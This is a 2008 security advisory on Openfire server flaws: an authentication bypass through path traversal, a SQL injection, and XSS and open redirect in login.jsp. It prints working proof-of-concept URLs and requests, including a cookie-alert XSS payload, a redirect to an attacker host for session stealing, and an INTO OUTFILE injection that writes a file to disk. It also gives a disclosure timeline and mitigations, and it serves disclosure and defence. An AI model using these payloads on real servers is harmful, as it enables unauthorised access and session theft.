AKADV2008-001-v1.0.txt

2008-11-08T00:00:00
ID PACKETSTORM:71718
Type packetstorm
Reporter Andreas Kurtz
Modified 2008-11-08T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256  
  
Advisory: Openfire Server Multiple Vulnerabilities  
Advisory ID: AKADV2008-001  
Release Date: 2008/11/07  
Revision: 1.0  
Last Modified: 2008/11/07  
Date Reported: 2008/05/17  
Author: Andreas Kurtz (mail at andreas-kurtz.de)  
Affected Software: Openfire Server <= 3.6.0a  
Remotely Exploitable: Yes  
Risk: Critical (x) High ( ) Medium ( ) Low ( )  
Vendor URL: http://www.igniterealtime.org  
http://www.jivesoftware.com/  
Vendor Status: No patch released yet.  
Patch development time: N/A  
  
  
Vulnerability description:  
- --------------------------  
  
The jabber server Openfire (<= version 3.6.0a) contains several serious  
vulnerabilities. Depending on the particular runtime environment these  
issues can potentially even be used by an attacker to execute code  
on operating system level.  
  
1) Authentication bypass  
This vulnerability provides an attacker full access to all functions  
in the admin webinterface without providing any user credentials.  
The Tomcat filter which is responsible for authentication could be  
completely circumvented.  
  
2) SQL injection  
It is possible to pass SQL statements to the backend database through  
a SQL injection vulnerability. Depending on the particular  
runtime environment and database permissions it is even possible to  
write files to disk and execute code on operating system level.  
  
3) Multiple Cross-Site Scripting  
Permits arbitrary insertion of HTML- and JavaScript code in login.jsp.  
An attacker could also manipulate a parameter to specify  
a destination to which a user will be forwarded to after successful  
authentication.  
  
  
Technical details:  
- ------------------  
  
1) Authentication bypass  
Authentication to the openfire admin interface is secured by a filter in  
the Tomcat application server (org.jivesoftware.admin.AuthCheckFilter).  
This filter guarantees that access to the admin interface is only granted  
to authenticated users. Otherwise they get redirected to a login page.  
  
A design error in Openfire enables access to internal functions  
without the need for admin user credentials.  
The deployment descriptor (web.xml) configures some exclude values  
for the AuthCheckFilter:  
  
<filter>  
<filter-name>AuthCheck</filter-name>  
<filter-class>org.jivesoftware.admin.AuthCheckFilter</filter-class>  
<init-param>  
<param-name>excludes</param-name>  
<param-value>login.jsp,index.jsp?logout=true,setup/index.jsp,  
setup/setup-,.gif,.png,error-serverdown.jsp</param-value>  
</init-param>  
</filter>  
  
When a request URL contains one of these Exclude-Strings the  
auth check mechanism is totally circumvented. This was considered  
necessary for the initial setup process or the presence plugin.  
Following POC demonstrates how an attacker could access  
internal functions by manipulating the URL providing one of these  
excludes(/setup/setup-/../../):  
  
http://www.foo.bar:9090/setup/setup-/../../log.jsp?log=info&mode=asc&lines=  
All  
  
2) SQL injection  
The parameter "type" in sipark-log-summary.jsp is prone to  
SQL injection. Untrusted user data enters the application in  
sipark-log-summary.jsp (line 163):  
  
String type = ParamUtils.getParameter(request, "type");  
  
The function getCalls() in org.jivesoftware.openfire.sip.calllog.CallLogDAO  
processes this user input (SQLCondition) and constructs a SQL statement:  
  
String sql = "SELECT * FROM sipPhoneLog";  
  
sql = SQLCondition != null && !SQLCondition.equals("") ?  
sql + " WHERE " + SQLCondition : sql;  
  
sql += " ORDER BY datetime DESC";  
  
That statement is executed in the method  
createScrollablePreparedStatement()  
in CallLogDAO (line 411):  
  
return con.prepareStatement(sql);  
  
In that case there is a SQL injection vulnerability present even though  
prepared statemens are used. This happens because the string sql is  
dynamically  
concatenated *before* it is passed to the prepared statement object.  
  
3) Cross-Site Scripting  
The parameter "url" in login.jsp was vulnerable to Cross-Site Scripting  
(XSS).  
This vulnerability is the only one which was fixed within the last 6  
months.  
  
http://www.foo.bar:9090/login.jsp?url="/><script>alert(document.cookie);</s  
cript>  
  
An attacker could also manipulate the parameter to specify a  
destination to which a user will be forwarded to after successful  
authentication:  
  
http://www.foo.bar:9090/login.jsp?url=http://www.attacker.com/StealSession  
  
If a user authenticates using that link it is easily possible for an  
attacker to hijack the users session.  
  
Furthermore the parameter "username" in login.jsp is still vulnerable  
to Cross-Site Scripting attacks.  
  
  
Putting it all together:  
- ------------------------  
  
Since the SIP-Plugin is deactivated by default, an attacker needs to  
install it using the authentication bypass vulnerability and the  
following POST request:  
  
POST  
http://www.foo.bar:9090/setup/setup-/../../dwr/exec/downloader.installPlugi  
n.dwr HTTP/1.1  
Host: www.foo.bar:9090  
  
callCount=1  
c0-scriptName=downloader  
c0-methodName=installPlugin  
c0-id=7931_1210973487852  
c0-param0=string:http%3A%2F%2Fwww.igniterealtime.org%2Fprojects%2Fopenfire%  
2Fplugins%2Fsip.jar  
c0-param1=string:661780277  
xml=true  
  
After that activation the described SQL injection vulnerability can  
be used in a single unauthenticated request.  
The following proof of concept uses a mysql database:  
  
http://www.foo.bar:9090/setup/setup-/../../plugins/sip/sipark-log-summary.j  
sp?  
type=all'UNION%20SELECT%20'attack-code'%20INTO%20OUTFILE%20'/tmp/attack.sh'  
%20/*&startDate=Any&endDate=Any&submit=true&get=Search  
  
  
Solution:  
- ---------  
  
Since the vendor didn't release a patch within the last 6 months it is  
highly recommended to deactivate access to the entire admin interface.  
This can be achieved for example by blocking the according ports  
(tcp/9090 & tcp/9091 by default) with a firewall. Following communication  
to the admin interface can be done via SSL tunnels.  
  
For more details see: http://www.andreas-kurtz.de/archives/63  
  
  
History:  
- --------  
  
2008/05/17 - Vendor notified using sales@jivesoftware.com  
2008/05/18 - Vendor notified using gaston@jivesoftware.com  
2008/05/20 - Vendor response  
2008/05/20 - Detailed vulnerability information sent to the vendor  
2008/05/21 - Vendor confirms the vulnerability  
2008/08/18 - Asked vendor for up to date information regarding the  
reported issues  
2008/10/18 - Again asked vendor for up to date information regarding the  
reported issues  
2008/10/31 - Informed vendor of planned advisory realease on 2008/11/05  
(no response)  
2008/11/07 - Full technical details and recommended measures released to  
general public  
  
  
Credits:  
- --------  
  
Vulnerability found and advisory written by Andreas Kurtz.  
  
  
References:  
- -----------  
  
http://www.andreas-kurtz.de/archives/63  
  
  
Changes:  
- --------  
  
Revision 0.1 - Initial draft release to the vendor  
Revision 1.0 - Final version released to general public  
  
  
Disclaimer:  
- -----------  
  
The information within this advisory may change without notice. Use  
of this information constitutes acceptance for use in an AS IS  
condition. There are no warranties, implied or express, with regard  
to this information. In no event shall the author be liable for any  
direct or indirect damages whatsoever arising out of or in connection  
with the use or spread of this information. Any use of this  
information is at the user's own risk.  
  
  
PGP Key:  
- --------  
  
http://www.andreas-kurtz.de/ak-pubkey.asc  
  
Copyright 2008 Andreas Kurtz. All rights reserved.  
  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP Desktop 9.9.0 (Build 397)  
Charset: utf-8  
  
wsBVAwUBSRQVbXDQzpO427ITAQgGFAgAvxGItsFtfHEn1TLcVne2V3lCvX8GNOCN  
3992EHNogahFXtIlgjG+cZl9nUZ5uIKiIUnv2LTwsGaQgYB6N8hxGMZr0bTIFlXP  
ZcAhMwn2bwYmocUGKxFO2+2wqFRKH5HYP9scvKRGZtm5m2JD37jQmKlR+2i+/4SY  
cwfUXfe+3ZNJcThVhN/B/+nN3jV7rSW8stj9J/uGZG91OUUlfJHTlUvNlmhO0JYd  
xIWiFl54XGkw2jmBkgJFQUa4eucbjxCGcxdgyECRH1eDiOjr97ATxpy+iAYMbs3R  
zdNOywO6stb+Ck1eB5d+7YKbd919AKuANU9sF2OI/sID1MjvpmrNcg==  
=iZdK  
-----END PGP SIGNATURE-----  
  
`